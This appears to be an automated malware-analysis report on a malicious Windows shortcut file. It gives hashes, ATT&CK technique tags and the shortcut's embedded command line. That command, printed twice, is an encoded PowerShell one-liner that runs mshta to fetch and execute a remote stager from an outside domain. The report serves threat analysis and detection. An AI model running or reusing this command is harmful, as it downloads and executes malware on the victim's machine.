Malicious

b5fbcce121ee4e0b0a9825875b4cedbf

LNK File | MD5: b5fbcce121ee4e0b0a9825875b4cedbf | Size: 2.75 KB | application/x-ms-shortcut

LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Characteristics
Hashes
MD5: b5fbcce121ee4e0b0a9825875b4cedbf
Sha1: cb82ae80067702e47b5a3a858ba1ae6d164138a3
Sha256: 79d3b29e267a7a41068c7ebea0bd4cfe9e16dc0cc03a034c8fadbc4426bfbbf7
Sha384: 6eb1645df5ad32f2d20a41429f06c1f684f02c95af74e2a356b7759822979f367b4599d71708c2438d50c5e0ba8c4a1e
Sha512: c27cac3444345c3f71828a3751becdfc08e255bb116a0a371ce2028d72eda301187057bb4aca3fe0c63f887d4fda2ed57b82de48a9b233b4543ff39b10f65e6c
SSDeep: 24:8Ayw/BHYVKVWO+/CWuO9xkz4Xxa5gmYXsrsysh6FtmVdd79dsHqThOr:8y5aS6kUXSgmYcQVh6FtmVdJ91Ir
TLSH: 9A51F2280AF101EAF673D7B99BF573B24966F7968D259ABC008063414722510B863E3A
File Structure
b5fbcce121ee4e0b0a9825875b4cedbf
LNK
Malicious
LOLBin
LOLBin:powershell.exe
Execution: CMD in LNK
T1059.003
T1202: Indirect Command Execution
T1204.002
Execution: PowerShell in LNK
T1059.001
PowerShell
Batch Command
PowerShell Call
DeObfuscated
Malicious
LNK CommandLine
PowerShell
Batch Command
PowerShell Call
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
DeObfuscated
Contains Base64 Block
Base64 Block
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Base64-Block]
Base64 Block
[Lnk Summary]
Malicious
Artefacts
Name
Value
LNK: Command Execution

powershell.exe powershell -E cwBjAGIAIAAnAF4AbQBeAF4AXgBeAHMAXgBeAF4AXgBoAF4AXgBeAHQAXgBeAF4AXgBhACAAXgBeAF4AXgBoAHQAXgB0AHAAcwBeAF4AXgBeADoALwBeAF4AXgBeAC8AcwBrAF4AXgBeAF4AaQBeAF4AXgBuAHMAbwBeAG4AcwBrAGkAbgBeAF4AXgBeAHMAbQBhAHIAawBlAF4AXgBeAHQAXgBeAF4AXgAuAGkAbgBeAF4AXgBeAGYAbwBeAF4AXgAvAGEAcABwAF4AXgBeAF4ALwBzAHQAXgBeAF4AYQBeAF4AZwBeAGUAcgBeAF4AXgAuAF4AXgBeAF4AbQBwAF4AXgBeADQAXgBeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA==

Deobfuscated PowerShell

-e "cwBjAGIAIAAnAF4AbQBeAF4AXgBeAHMAXgBeAF4AXgBoAF4AXgBeAHQAXgBeAF4AXgBhACAAXgBeAF4AXgBoAHQAXgB0AHAAcwBeAF4AXgBeADoALwBeAF4AXgBeAC8AcwBrAF4AXgBeAF4AaQBeAF4AXgBuAHMAbwBeAG4AcwBrAGkAbgBeAF4AXgBeAHMAbQBhAHIAawBlAF4AXgBeAHQAXgBeAF4AXgAuAGkAbgBeAF4AXgBeAGYAbwBeAF4AXgAvAGEAcABwAF4AXgBeAF4ALwBzAHQAXgBeAF4AYQBeAF4AZwBeAGUAcgBeAF4AXgAuAF4AXgBeAF4AbQBwAF4AXgBeADQAXgBeAF4AXgBeACcALgByAGUAcABsAGEAYwBlACgAJwBeACcALAAnACcAKQA7AGkAZQB4ACAAKABnAGMAYgApAA=="

Characteristics
No malware configuration was found at this point.
Artefacts
Name | Location
LNK: Command Execution | b5fbcce121ee4e0b0a9825875b4cedbf (Malicious)
Deobfuscated PowerShell | b5fbcce121ee4e0b0a9825875b4cedbf > LNK CommandLine > [PowerShell Command] (Malicious)
